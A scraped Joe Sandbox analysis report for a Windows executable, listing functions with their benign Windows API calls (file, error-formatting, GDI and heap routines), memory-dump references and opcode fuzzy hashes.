Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction ID: bf313ac47c3d6317bb55cdf96b3b576ce68207ace33f7adea141d00feb772546
Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction Fuzzy Hash: 2051B372B15E9545FF10EFA5AC144BAA3A4FB88BE8B848531DE1D17B85EF3CD04A9310

Function 00007FF716152080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00007FF71615210B

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction ID: 93b69a97faa0f7a3fe51b65ee56b4457865275da0472d001caa45f9f86c06f9d
Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction Fuzzy Hash: 00D1E333B1868287EB64DF19F5846AAF7A1F789794F548134EB4E53B48CA3CE845DB00

Function 00007FF71611B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF71611BA9D), ref: 00007FF71611B6E5
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,00007FF71611BA9D), ref: 00007FF71611B719
LocalFree.KERNEL32(?,?,?,?,?,?,?,00007FF71611BA9D), ref: 00007FF71611B743

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction ID: db4f9c9d5cdf15e260752c885b3c468fd0e1109229e36adbfab7b1879dfe799c
Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction Fuzzy Hash: 6E01E175608B4182E750AF26BC5017BE365BB897D0F844035DA8D87B49DF3CD5499710

Function 00007FF71614FCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

., xrefs: 00007FF71614FEE4

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction ID: 7c34ed7efab7c753a89e19addd9e0a139963984a9c756fa140b4a4fd6518cf32
Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction Fuzzy Hash: 25310C32B08E9149F720AA2ABC087BBEA91AB95BF4F548235DE5C07BC5DF3CD5059300

Function 00007FF716155AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF716155D45
RaiseException.KERNEL32 ref: 00007FF716155D56

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
Instruction ID: 139fb7323e0e070efec14b0f271ac3096c5c82e74ebaf73845ff0921db2f41d1
Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
Instruction Fuzzy Hash: 40B1AB33600B888BEB19DF2DD84636DBBB0F741BA8F188821DA5D837A8CB39D455D710

Function 00007FF716138DF4 Relevance: 3.2, APIs: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7161385E0: GetDC.USER32 ref: 00007FF7161385EC
Part of subcall function 00007FF7161385E0: GetDeviceCaps.GDI32 ref: 00007FF7161385FD
Part of subcall function 00007FF7161385E0: ReleaseDC.USER32 ref: 00007FF71613860A

GetObjectW.GDI32 ref: 00007FF716138E48

Part of subcall function 00007FF7161390B0: GetDC.USER32 ref: 00007FF7161390D9
Part of subcall function 00007FF7161390B0: GetObjectW.GDI32 ref: 00007FF716139107
Part of subcall function 00007FF7161390B0: ReleaseDC.USER32 ref: 00007FF7161391BB

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID:
API String ID: 1061551593-0
Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
Instruction ID: 234105c436c62c0a43d804db8f8d706277d049ee7625f085b90d85b8bd92f18f
Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
Instruction Fuzzy Hash: D2815932B18E1586FB50DB6AE8406AEB771FB88BA8F414132CE4E57728DF38D548D350

Function 00007FF71613A2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF71613A315
GetNumberFormatW.KERNEL32 ref: 00007FF71613A371

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction ID: efa2218d86b6fd22bf5e3ad30cfd5a83898ea5374646b979af5e20974ef363f3
Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction Fuzzy Hash: 5C114A26A08B8195F661AB21F8003EAB360FF88BA8FC54135DA4D07658EF3CD559D754

Function 00007FF71612126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7161224C0: CreateFileW.KERNELBASE ref: 00007FF71612259B
Part of subcall function 00007FF7161224C0: GetLastError.KERNEL32 ref: 00007FF7161225AE
Part of subcall function 00007FF7161224C0: CreateFileW.KERNEL32 ref: 00007FF71612260E
Part of subcall function 00007FF7161224C0: GetLastError.KERNEL32 ref: 00007FF716122617

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161215D0

Part of subcall function 00007FF716123980: MoveFileW.KERNEL32 ref: 00007FF7161239BD
Part of subcall function 00007FF716123980: MoveFileW.KERNEL32 ref: 00007FF716123A34

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 34527147-0
Opcode ID: 1488c1936801c91a2cee98249e7db5a0996b073c688c31523c97a3bef9f1bd63
Instruction ID: 021723c725c1415ff8d8c0e38c4d0b83e473ccf98c61ad815a5287a8e4bf7a9b
Opcode Fuzzy Hash: 1488c1936801c91a2cee98249e7db5a0996b073c688c31523c97a3bef9f1bd63
Instruction Fuzzy Hash: 0191C366B18E4682FA10EB62E8452AFA362FB45BE4F904036EF0D47B95DF3CD549D310

Function 00007FF7161251A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF7161251D5

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
Instruction ID: f814852b284b7bdd2793ca4a275c7195975cd9fe5080cbcc9226af9fa0a9e826
Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
Instruction Fuzzy Hash: 84012DB9908A42CBF664AB10FC51777B3A1BBA8324FD04238D55E42794DB3CF408DE20

Function 00007FF716148C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF716148DD3

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
Instruction ID: 083cd0c7f6d51e6b9c5043105e13bf8a88e42d3018b93287b44b9f7168a23350
Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
Instruction Fuzzy Hash: FE814931A19D0242FAE4AA15AC406BFA390EF50764FD51532DD0997695EF2DE84EF320

Function 00007FF7161489A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF716148B3A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction ID: 3330734ea457adb104f4eb83fcaa5dc0f08fb721814494c1e140e4f26f0243ba
Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction Fuzzy Hash: EB712931A0CE4246FBE4AA14784027FE3909F41764FA55931CE09876E6EF6DE44EF721

Function 00007FF71612C96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

gj, xrefs: 00007FF71612C97B

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
Instruction ID: 8d6c88bd2cc3ada6901644f325a5d420cdf4987022d1a415891ed70b9878af3c
Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
Instruction Fuzzy Hash: DB5192377286908BD754CF25E800A9EB3A5F388798F455126EF4A93B09DB3DE945CF40

Function 00007FF71614C838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF71614C874

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
Instruction ID: e3d7c8290fb3f274090d1abbc0011400576aa79f4845ed9e558b4c299ba211ec
Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
Instruction Fuzzy Hash: 7841BE72714E4586FE04DF2AE8142AAB3A1B758FE4B899036DE0D87754EF7CD049D300

Function 00007FF716150D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF716150D24

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction ID: e9efed505a0a31326a725f920308b734e4824a386e12eec86a6d5a467facb510
Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction Fuzzy Hash: 13B09224E17E02C2FA887B197C82255A2A5BF48720FD58078C50C41320DE2C24ADAB20

Function 00007FF716133964 Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
Instruction ID: 345ae1433715b78a9f1b709a7023091cc409ba81d9cdd9c3569c45343301c6e5
